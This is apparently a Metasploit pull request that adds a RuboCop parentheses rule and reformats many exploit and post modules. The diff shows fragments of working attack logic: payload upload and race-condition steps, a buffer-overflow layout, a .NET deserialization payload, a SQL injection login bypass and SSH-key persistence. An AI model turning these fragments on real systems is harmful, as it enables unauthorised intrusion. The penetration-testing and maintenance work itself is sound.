### PR TITLE
Add rubocop method call with args parenthesis rule

### DIFF
--- a/.rubocop.yml
+++ b/.rubocop.yml
@@ -214,6 +214,22 @@ Style/PercentLiteralDelimiters:
     '%q': '{}' # Chosen for module descriptions as () are frequently used characters, whilst {} are rarely used
   VersionChanged: '0.48.1'
 
+Style/MethodCallWithArgsParentheses:
+  Enabled: true
+  Description: 'This cop enforces the presence (default) in method calls containing parameters.'
+  IgnoredPatterns:
+    # Common functions that we're impartial towards
+    - ^puts
+    - ^sleep
+    - ^Rex.sleep
+    - ^cmd_exec
+    - ^require
+    - ^raise
+    # Gemfile DSL
+    - ^gemspec
+    - ^gem
+    - ^source
+
 Style/RedundantBegin:
   Exclude:
     # this pattern is very common and somewhat unavoidable

--- a/Gemfile
+++ b/Gemfile
@@ -26,7 +26,7 @@ group :development do
   gem 'ruby-prof'
   # Metasploit::Aggregator external session proxy
   # disabled during 2.5 transition until aggregator is available
-  #gem 'metasploit-aggregator'
+  # gem 'metasploit-aggregator'
 end
 
 group :development, :test do

--- a/modules/auxiliary/scanner/http/limesurvey_zip_traversals.rb
+++ b/modules/auxiliary/scanner/http/limesurvey_zip_traversals.rb
@@ -67,7 +67,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def cve_2020_11455(cookie, ip)
     vprint_status('Attempting to retrieve file')
-    print_error 'This method will possibly delete the file retrieved!!!'
+    print_error('This method will possibly delete the file retrieved!!!')
     traversal = '../' * datastore['DEPTH']
     res = send_request_cgi({
       'method' => 'GET',
@@ -180,26 +180,26 @@ class MetasploitModule < Msf::Auxiliary
 
   def run_host(ip)
     cookie = login
-    version = determine_version cookie
+    version = determine_version(cookie)
     if version.nil?
       # try them all!!!
       print_status('Unable to determine version, trying all exploits')
-      cve_2020_11455 cookie, ip
-      cve_2019_9960_3_15_9 cookie, ip
-      cve_2019_9960_pre3_15_9 cookie, ip
+      cve_2020_11455(cookie, ip)
+      cve_2019_9960_3_15_9(cookie, ip)
+      cve_2019_9960_pre3_15_9(cookie, ip)
     end
-    vprint_status "Version Detected: #{version.version}"
+    vprint_status("Version Detected: #{version.version}")
     if version.between?(Gem::Version.new('4.0'), Gem::Version.new('4.1.11'))
-      cve_2020_11455 cookie, ip
+      cve_2020_11455(cookie, ip)
     elsif version.between?(Gem::Version.new('2.50.0'), Gem::Version.new('3.15.9'))
-      cve_2019_9960_version_3 cookie, ip
+      cve_2019_9960_version_3(cookie, ip)
     # 2.50 is when LimeSurvey started doing almost daily releases.  This version was
     # picked arbitrarily as I can't seem to find a lower bounds on when this other
     # method may be needed.
     elsif version < Gem::Version.new('2.50.0')
-      cve_2019_9960_pre25 cookie, ip
+      cve_2019_9960_pre25(cookie, ip)
     else
-      print_bad "No exploit for version #{version.version}"
+      print_bad("No exploit for version #{version.version}")
     end
   end
 end

--- a/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
+++ b/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
@@ -212,7 +212,7 @@ class MetasploitModule < Msf::Auxiliary
     rdp_connect
     is_rdp, server_selected_proto = rdp_check_protocol
 
-    requires_nla = [RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX].include? server_selected_proto
+    requires_nla = [RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX].include?(server_selected_proto)
     product_version = (version_info && version_info[:product_version]) ? version_info[:product_version] : 'N/A'
     info = "Detected RDP on #{peer} (Windows version: #{product_version})"
 

--- a/modules/exploits/linux/http/pandora_ping_cmd_exec.rb
+++ b/modules/exploits/linux/http/pandora_ping_cmd_exec.rb
@@ -54,7 +54,7 @@ class MetasploitModule < Msf::Exploit::Remote
     })
 
     unless res
-      vprint_error 'Connection failed'
+      vprint_error('Connection failed')
       return CheckCode::Unknown
     end
 
@@ -116,7 +116,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Attempting to authenticate using (#{datastore['USERNAME']}:#{datastore['PASSWORD']})")
     auth = authenticate
     unless auth
-      fail_with Failure::NoAccess, 'Please provide a valid username and password.'
+      fail_with(Failure::NoAccess, 'Please provide a valid username and password.')
     end
 
     id_agente = 1

--- a/modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb
+++ b/modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb
@@ -206,7 +206,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return
     end
 
-    cipher = OpenSSL::Cipher.new 'AES-128-CBC'
+    cipher = OpenSSL::Cipher.new('AES-128-CBC')
     # in the original C code the key and IV are 256 bits long... but they still use AES-128
     iv = '1234567890abcdef'
     key = 'TPONEMESH_Kf!xn?'

--- a/modules/exploits/osx/local/vmware_fusion_lpe.rb
+++ b/modules/exploits/osx/local/vmware_fusion_lpe.rb
@@ -57,13 +57,13 @@ class MetasploitModule < Msf::Exploit::Local
       )
     )
 
-    register_options [
+    register_options([
       OptInt.new('MAXATTEMPTS', [true, 'Maximum attempts to win race for 11.5.3', 75])
-    ]
+    ])
 
-    register_advanced_options [
+    register_advanced_options([
       OptBool.new('ForceExploit', [false, 'Override check result', false])
-    ]
+    ])
   end
 
   def open_usb_service
@@ -77,7 +77,7 @@ class MetasploitModule < Msf::Exploit::Local
   def get_home_dir
     home = cmd_exec 'echo ~'
     if home.blank?
-      fail_with Failure::BadConfig, 'Unable to determine home dir for shell.'
+      fail_with(Failure::BadConfig, 'Unable to determine home dir for shell.')
     end
     home
   end
@@ -100,7 +100,7 @@ class MetasploitModule < Msf::Exploit::Local
     version_raw = cmd_exec "plutil -p '/Applications/VMware Fusion.app/Contents/Info.plist' | grep CFBundleShortVersionString"
     /=> "(?<version>\d{0,2}\.\d{0,2}\.\d{0,2})"/ =~ version_raw # supposed 11.x is also vulnerable, but everyone whos tested shows 11.5.1 or 11.5.2
     if version_raw.blank?
-      fail_with Failure::BadConfig, 'Unable to determine VMware Fusion version.  Set ForceExploit to override.'
+      fail_with(Failure::BadConfig, 'Unable to determine VMware Fusion version.  Set ForceExploit to override.')
     end
     Gem::Version.new(version)
   end
@@ -108,38 +108,38 @@ class MetasploitModule < Msf::Exploit::Local
   def pre_11_5_3
     # Upload payload executable & chmod
     payload_filename = "#{base_dir}#{usb_service}"
-    print_status "Uploading Payload: #{payload_filename}"
-    write_file payload_filename, generate_payload_exe
-    chmod payload_filename, 0o755
-    register_file_for_cleanup payload_filename
+    print_status("Uploading Payload: #{payload_filename}")
+    write_file(payload_filename, generate_payload_exe)
+    chmod(payload_filename, 0o755)
+    register_file_for_cleanup(payload_filename)
 
     # create folder structure and hard link to the original binary
     root_link_folder = "#{get_home_dir}/#{rand_text_alphanumeric(2..5)}" # for cleanup later
     link_folder = "#{root_link_folder}/#{rand_text_alphanumeric(2..5)}/#{rand_text_alphanumeric(2..5)}/"
     cmd_exec "mkdir -p #{link_folder}"
     cmd_exec "ln '/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}' '#{link_folder}#{open_usb_service}'"
-    print_status "Created folder (#{link_folder}) and link"
+    print_status("Created folder (#{link_folder}) and link")
 
-    print_status 'Starting USB Service (5 sec pause)'
+    print_status('Starting USB Service (5 sec pause)')
     # XXX: The ; used by cmd_exec will interfere with &, so pad it with :
     cmd_exec "cd #{link_folder}; '#{link_folder}/#{open_usb_service}' & :"
     Rex.sleep 5 # give time for the service to execute our payload
-    print_status 'Killing service'
+    print_status('Killing service')
     cmd_exec "pkill '#{open_usb_service}'"
-    print_status "Deleting #{root_link_folder}"
-    rm_rf root_link_folder
+    print_status("Deleting #{root_link_folder}")
+    rm_rf(root_link_folder)
   end
 
   def exactly_11_5_3
     # Upload payload executable & chmod
     payload_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}"
-    print_status "Uploading Payload to #{payload_name}"
-    write_file payload_name, generate_payload_exe
-    chmod payload_name, 0o755
+    print_status("Uploading Payload to #{payload_name}")
+    write_file(payload_name, generate_payload_exe)
+    chmod(payload_name, 0o755)
     # create race with codesign check
     root_link_folder = "#{get_home_dir}/#{rand_text_alphanumeric(2..5)}" # for cleanup later
     link_folder = "#{root_link_folder}/#{rand_text_alphanumeric(2..5)}/#{rand_text_alphanumeric(2..5)}/"
-    print_status 'Uploading race condition executable.'
+    print_status('Uploading race condition executable.')
     race = <<~EOF
       #!/bin/sh
       while [ "1" = "1" ]; do
@@ -148,11 +148,11 @@ class MetasploitModule < Msf::Exploit::Local
       done
     EOF
     racer_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}"
-    upload_and_chmodx racer_name, race
-    register_file_for_cleanup racer_name
-    register_dirs_for_cleanup root_link_folder
+    upload_and_chmodx(racer_name, race)
+    register_file_for_cleanup(racer_name)
+    register_dirs_for_cleanup(root_link_folder)
     # create the hard link
-    print_status "Creating folder (#{link_folder}) and link"
+    print_status("Creating folder (#{link_folder}) and link")
     cmd_exec "mkdir -p #{link_folder}"
     cmd_exec "ln '/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}' '#{link_folder}#{open_usb_service}'"
 
@@ -167,34 +167,34 @@ class MetasploitModule < Msf::Exploit::Local
       done
     EOF
     runner_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}"
-    upload_and_chmodx runner_name, launcher
-    register_file_for_cleanup runner_name
+    upload_and_chmodx(runner_name, launcher)
+    register_file_for_cleanup(runner_name)
 
-    print_status "Launching Exploit #{runner_name} (sleeping 15sec)"
+    print_status("Launching Exploit #{runner_name} (sleeping 15sec)")
     # XXX: The ; used by cmd_exec will interfere with &, so pad it with :
     results = cmd_exec "#{runner_name} & :"
     Rex.sleep 15 # give time for the service to execute our payload
-    vprint_status results
+    vprint_status(results)
 
-    print_status 'Exploit Finished, killing scripts.'
-    kill_process racer_name
-    kill_process runner_name # in theory should be killed already but just in case
-    kill_process "'#{link_folder}#{open_usb_service}'"
+    print_status('Exploit Finished, killing scripts.')
+    kill_process(racer_name)
+    kill_process(runner_name) # in theory should be killed already but just in case
+    kill_process("'#{link_folder}#{open_usb_service}'")
     # kill_process 'ln' a rogue ln -f may mess us up, but killing them seemed to be unreliable and mark the exploit as failed.
     # above caused: [-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Unknown error
     # rm_rf base_dir # this always fails. Leaving it here as a note that when things dont kill well, can't delete the folder
   end
 
   def check
-    unless exists? "/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}"
-      print_bad "'#{open_usb_service}' binary missing"
+    unless exists?("/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}")
+      print_bad("'#{open_usb_service}' binary missing")
       return CheckCode::Safe
     end
     version = get_version
     if version.between?(Gem::Version.new('10.1.3'), Gem::Version.new('11.5.3'))
-      vprint_good "Vmware Fusion #{version} is exploitable"
+      vprint_good("Vmware Fusion #{version} is exploitable")
     else
-      print_bad "VMware Fusion #{version} is NOT exploitable"
+      print_bad("VMware Fusion #{version} is NOT exploitable")
       return CheckCode::Safe
     end
     CheckCode::Appears
@@ -204,37 +204,37 @@ class MetasploitModule < Msf::Exploit::Local
     # First check the system is vulnerable, or the user wants to run regardless
     unless check == CheckCode::Appears
       unless datastore['ForceExploit']
-        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+        fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.')
       end
-      print_warning 'Target does not appear to be vulnerable'
+      print_warning('Target does not appear to be vulnerable')
     end
 
     # Check if we're already root
     if is_root?
       unless datastore['ForceExploit']
-        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'
+        fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override')
       end
     end
 
     # Make sure we can write our payload to the remote system
-    rm_rf content_dir # live dangerously.
-    if directory? content_dir
-      fail_with Failure::BadConfig, "#{content_dir} exists. Unable to delete automatically.  Please delete or exploit will fail."
+    rm_rf(content_dir) # live dangerously.
+    if directory?(content_dir)
+      fail_with(Failure::BadConfig, "#{content_dir} exists. Unable to delete automatically.  Please delete or exploit will fail.")
     end
     cmd_exec "mkdir -p #{base_dir}"
-    register_dirs_for_cleanup content_dir
-    unless writable? base_dir
-      fail_with Failure::BadConfig, "#{base_dir} is not writable."
+    register_dirs_for_cleanup(content_dir)
+    unless writable?(base_dir)
+      fail_with(Failure::BadConfig, "#{base_dir} is not writable.")
     end
 
     version = get_version
     if version == Gem::Version.new('11.5.3')
-      vprint_status 'Using 11.5.3 exploit'
+      vprint_status('Using 11.5.3 exploit')
       exactly_11_5_3
     elsif version.between?(Gem::Version.new('10.1.3'), Gem::Version.new('11.5.2'))
-      vprint_status 'Using pre-11.5.3 exploit'
+      vprint_status('Using pre-11.5.3 exploit')
       pre_11_5_3
     end
-    rm_rf content_dir # live dangerously.
+    rm_rf(content_dir) # live dangerously.
   end
 end

--- a/modules/exploits/windows/http/kentico_staging_syncserver.rb
+++ b/modules/exploits/windows/http/kentico_staging_syncserver.rb
@@ -11,45 +11,51 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Powershell
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name' => 'Kentico CMS Staging SyncServer Unserialize Remote Command Execution',
-      'Description' => %q{
-        This module exploits a vulnerability in the Kentico CMS platform versions 12.0.14 and earlier.
-        Remote Command Execution is possible via unauthenticated XML requests to the Staging Service
-        SyncServer.asmx interface ProcessSynchronizationTaskData method stagingTaskData parameter. XML
-        input is passed to an insecure .NET deserialize call which allows for remote command execution.
-      },
-      'DisclosureDate' => '2019-04-15',
-      'Author' =>
-        [
-          'Manoj Cherukuri',  # Discovery
-          'Justin LeMay',     # Discovery
-          'aushack',          # msf exploit
-        ],
-      'References' =>
-        [
-          ['CVE', '2019-10068'],
-          ['URL', 'https://www.aon.com/cyber-solutions/aon_cyber_labs/unauthenticated-remote-code-execution-in-kentico-cms/']
-        ],
-      'License' => MSF_LICENSE,
-      'Platform' => 'win',
-      'Payload' => { 'DisableNops' => true },
-      'Targets' => [
-        [ 'Windows EXE Dropper',
-          'Arch'  => [ARCH_X86, ARCH_X64],
-          'Type'  => :windows_dropper
-        ],
-        [ 'Windows Command',
-          'Arch'  => ARCH_CMD,
-          'Type'  => :windows_command,
-          'Space' => 3000
-        ],
-        [ 'Windows Powershell',
-          'Arch'  => [ARCH_X86, ARCH_X64],
-          'Type'  => :windows_powershell
+    super(
+      update_info(
+        info,
+        'Name' => 'Kentico CMS Staging SyncServer Unserialize Remote Command Execution',
+        'Description' => %q{
+          This module exploits a vulnerability in the Kentico CMS platform versions 12.0.14 and earlier.
+          Remote Command Execution is possible via unauthenticated XML requests to the Staging Service
+          SyncServer.asmx interface ProcessSynchronizationTaskData method stagingTaskData parameter. XML
+          input is passed to an insecure .NET deserialize call which allows for remote command execution.
+        },
+        'DisclosureDate' => '2019-04-15',
+        'Author' =>
+          [
+            'Manoj Cherukuri', # Discovery
+            'Justin LeMay', # Discovery
+            'aushack', # msf exploit
+          ],
+        'References' =>
+          [
+            ['CVE', '2019-10068'],
+            ['URL', 'https://www.aon.com/cyber-solutions/aon_cyber_labs/unauthenticated-remote-code-execution-in-kentico-cms/']
+          ],
+        'License' => MSF_LICENSE,
+        'Platform' => 'win',
+        'Payload' => { 'DisableNops' => true },
+        'Targets' => [
+          [
+            'Windows EXE Dropper',
+            'Arch' => [ARCH_X86, ARCH_X64],
+            'Type' => :windows_dropper
+          ],
+          [
+            'Windows Command',
+            'Arch' => ARCH_CMD,
+            'Type' => :windows_command,
+            'Space' => 3000
+          ],
+          [
+            'Windows Powershell',
+            'Arch' => [ARCH_X86, ARCH_X64],
+            'Type' => :windows_powershell
+          ]
         ]
-      ]
-    ))
+      )
+    )
 
     register_options([
       OptString.new('TARGETURI', [ true, 'Path to SyncServer.asmx', '/CMSPages/Staging/SyncServer.asmx']),
@@ -75,14 +81,14 @@ class MetasploitModule < Msf::Exploit::Remote
     when :windows_command
       execute_command(payload.encoded)
     when :windows_dropper
-      cmd_target = targets.select {|target| target['Type'] == :windows_command}.first
-      execute_cmdstager({linemax: cmd_target.opts['Space']})
+      cmd_target = targets.select { |target| target['Type'] == :windows_command }.first
+      execute_cmdstager({ linemax: cmd_target.opts['Space'] })
     when :windows_powershell
       execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))
     end
   end
 
-  def execute_command(cmd, opts = {})
+  def execute_command(cmd, _opts = {})
     sploit = ::Msf::Util::DotNetDeserialization.generate(
       cmd,
       gadget_chain: :WindowsIdentity,
@@ -90,9 +96,9 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     res = send_request_cgi({
-      'uri'       => normalize_uri(target_uri.path, '/ProcessSynchronizationTaskData'),
-      'method'    => 'POST',
-      'vars_post' => {'stagingTaskData' => sploit}
+      'uri' => normalize_uri(target_uri.path, '/ProcessSynchronizationTaskData'),
+      'method' => 'POST',
+      'vars_post' => { 'stagingTaskData' => sploit }
     })
 
     unless res && res.body.include?('Unable to cast object of type')

--- a/modules/exploits/windows/local/ntusermndragover.rb
+++ b/modules/exploits/windows/local/ntusermndragover.rb
@@ -20,50 +20,50 @@ class MetasploitModule < Msf::Exploit::Local
   def initialize(info = {})
     super(
         update_info(
-            info,
-            'Name' => 'Microsoft Windows NtUserMNDragOver Local Privilege Elevation',
-            'Description' => %q{
-               This module exploits a NULL pointer dereference vulnerability in
-               MNGetpItemFromIndex(), which is reachable via a NtUserMNDragOver() system call.
+          info,
+          'Name' => 'Microsoft Windows NtUserMNDragOver Local Privilege Elevation',
+          'Description' => %q{
+            This module exploits a NULL pointer dereference vulnerability in
+            MNGetpItemFromIndex(), which is reachable via a NtUserMNDragOver() system call.
 
-               The NULL pointer dereference occurs because the xxxMNFindWindowFromPoint()
-               function does not effectively check the validity of the tagPOPUPMENU
-               objects it processes before passing them on to MNGetpItemFromIndex(),
-               where the NULL pointer dereference will occur.
+            The NULL pointer dereference occurs because the xxxMNFindWindowFromPoint()
+            function does not effectively check the validity of the tagPOPUPMENU
+            objects it processes before passing them on to MNGetpItemFromIndex(),
+            where the NULL pointer dereference will occur.
 
-               This module has been tested against Windows 7 x86 SP0 and SP1. Offsets
-               within the solution may need to be adjusted to work with other versions
-               of Windows, such as Windows Server 2008.
-        },
-            'License' => MSF_LICENSE,
-            'Author' =>
-                [
-                    'Clément Lecigne', # discovery
-                    'Grant Willcox', # exploit
-                    'timwr' # msf module
-                ],
-            'Platform' => 'win',
-            'SessionTypes' => ['meterpreter'],
-            'Targets' =>
-                [
-                    ['Windows 7 x86', { 'Arch' => ARCH_X86 }]
-                ],
-            'SideEffects' => [SCREEN_EFFECTS],
-            'References' =>
-                [
-                    ['CVE', '2019-0808'],
-                    ['URL', 'https://github.com/exodusintel/CVE-2019-0808'],
-                    ['URL', 'https://github.com/ze0r/cve-2019-0808-poc'],
-                    ['URL', 'http://blogs.360.cn/post/RootCause_CVE-2019-0808_EN.html'],
-                    ['URL', 'https://blog.exodusintel.com/2019/05/17/windows-within-windows/'],
-                ],
-            'DisclosureDate' => 'Mar 12 2019',
-            'DefaultTarget' => 0
+            This module has been tested against Windows 7 x86 SP0 and SP1. Offsets
+            within the solution may need to be adjusted to work with other versions
+            of Windows, such as Windows Server 2008.
+          },
+          'License' => MSF_LICENSE,
+          'Author' =>
+              [
+                'Clément Lecigne', # discovery
+                'Grant Willcox', # exploit
+                'timwr' # msf module
+              ],
+          'Platform' => 'win',
+          'SessionTypes' => ['meterpreter'],
+          'Targets' =>
+              [
+                ['Windows 7 x86', { 'Arch' => ARCH_X86 }]
+              ],
+          'SideEffects' => [SCREEN_EFFECTS],
+          'References' =>
+              [
+                ['CVE', '2019-0808'],
+                ['URL', 'https://github.com/exodusintel/CVE-2019-0808'],
+                ['URL', 'https://github.com/ze0r/cve-2019-0808-poc'],
+                ['URL', 'http://blogs.360.cn/post/RootCause_CVE-2019-0808_EN.html'],
+                ['URL', 'https://blog.exodusintel.com/2019/05/17/windows-within-windows/'],
+              ],
+          'DisclosureDate' => 'Mar 12 2019',
+          'DefaultTarget' => 0
         )
     )
     register_options([
-                         OptString.new('PROCESS', [true, 'Name of process to spawn and inject dll into.', 'notepad.exe'])
-                     ])
+      OptString.new('PROCESS', [true, 'Name of process to spawn and inject dll into.', 'notepad.exe'])
+    ])
   end
 
   def setup_process

--- a/modules/exploits/windows/misc/ais_esel_server_rce.rb
+++ b/modules/exploits/windows/misc/ais_esel_server_rce.rb
@@ -89,7 +89,7 @@ class MetasploitModule < Msf::Exploit::Remote
     response = sock.recv(10000)
 
     if check_response
-      if (response.include? 'Zugangsdaten Falsch') && (response.length > (length - 20))
+      if response.include?('Zugangsdaten Falsch') && (response.length > (length - 20))
         print_good('Correct response received => Data send successfully')
       else
         print_warning('Wrong response received => Probably data could not be sent successfully')
@@ -118,7 +118,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     int = rand(1..1_000)
     response_bypass = send_login_msg(create_login_msg("#{rand(1_000..9_999)}' OR #{int}=#{int}--"), false)
-    if response_bypass.include? 'Zugangsdaten OK'
+    if response_bypass.include?('Zugangsdaten OK')
       CheckCode::Vulnerable
     else
       print_status("Response was: #{response_bypass}")

--- a/modules/exploits/windows/misc/crosschex_device_bof.rb
+++ b/modules/exploits/windows/misc/crosschex_device_bof.rb
@@ -74,13 +74,13 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::TimeoutExpired, 'Module timed out waiting for CrossChex broadcast')
     end
 
-    print_status 'CrossChex broadcast received, sending payload in response'
+    print_status('CrossChex broadcast received, sending payload in response')
     sploit = rand_text_english(target['Offset'])
     sploit << target.ret # Overwrites saved EIP with address of 'JMP ESP' assembly instruction found in CrossChex code
     sploit << rand_text_english(target['Shift']) # Positions payload to be written at beginning of ESP
     sploit << payload.encoded
 
     udp_sock.sendto(sploit, host, port)
-    print_status 'Payload sent'
+    print_status('Payload sent')
   end
 end

--- a/modules/exploits/windows/smb/ms17_010_eternalblue.rb
+++ b/modules/exploits/windows/smb/ms17_010_eternalblue.rb
@@ -279,7 +279,7 @@ class MetasploitModule < Msf::Exploit::Remote
       ret = false
       # search if its in patterns
       target['os_patterns'].each do |pattern|
-        if os.downcase.include? pattern.downcase
+        if os.downcase.include?(pattern.downcase)
           ret = true
           break
         end

--- a/modules/post/windows/manage/execute_dotnet_assembly.rb
+++ b/modules/post/windows/manage/execute_dotnet_assembly.rb
@@ -106,7 +106,7 @@ class MetasploitModule < Msf::Post
   end
 
   def sanitize_process_name(process_name)
-    if process_name.split(//).last(4).join.eql? '.exe'
+    if process_name.split(//).last(4).join.eql?('.exe')
       out_process_name = process_name
     else
       process_name + '.exe'

--- a/modules/post/windows/manage/sshkey_persistence.rb
+++ b/modules/post/windows/manage/sshkey_persistence.rb
@@ -114,7 +114,7 @@ class MetasploitModule < Msf::Post
     if auth_key_file
       auth_key_file = auth_key_file.gsub('%h', '')
       auth_key_file = auth_key_file.gsub('%%', '%')
-      if auth_key_file.start_with? '/'
+      if auth_key_file.start_with?('/')
         auth_key_file = auth_key_file[1..-1]
       end
     else


### PR DESCRIPTION
Let's enforce consitency of parenthesis on method calls. I'm running Rubocop on some of the recently landed modules.

Command ran:

> rubocop -a modules/auxiliary/scanner/http/limesurvey_zip_traversals.rb  modules/exploits/linux/http/nexus_repo_manager_el_injection.rb  modules/exploits/linux/http/pandora_ping_cmd_exec.rb  modules/exploits/linux/http/vestacp_exec.rb  modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb  modules/exploits/multi/http/liferay_java_unmarshalling.rb  modules/exploits/multi/http/playsms_template_injection.rb  modules/exploits/osx/local/vmware_fusion_lpe.rb  modules/exploits/unix/webapp/thinkphp_rce.rb  modules/exploits/windows/local/cve_2020_0796_smbghost.rb  modules/post/windows/gather/credentials/teamviewer_passwords.rb  modules/post/windows/manage/execute_dotnet_assembly.rb modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb modules/exploits/linux/local/exim4_deliver_message_priv_esc.rb modules/exploits/unix/smtp/opensmtpd_mail_from_rce.rb modules/exploits/windows/http/file_sharing_wizard_seh.rb modules/exploits/windows/misc/ais_esel_server_rce.rb modules/exploits/windows/misc/crosschex_device_bof.rb modules/exploits/windows/smb/ms17_010_eternalblue.rb modules/exploits/windows/telnet/goodtech_telnet.rb modules/payloads/singles/windows/pingback_reverse_tcp.rb modules/post/windows/manage/sshkey_persistence.rb modules/exploits/windows/http/kentico_staging_syncserver.rb modules/exploits/windows/local/ntusermndragover.rb

I can run Rubocop on more modules/files as examples if we want to have a more indepth conversation / view of examples.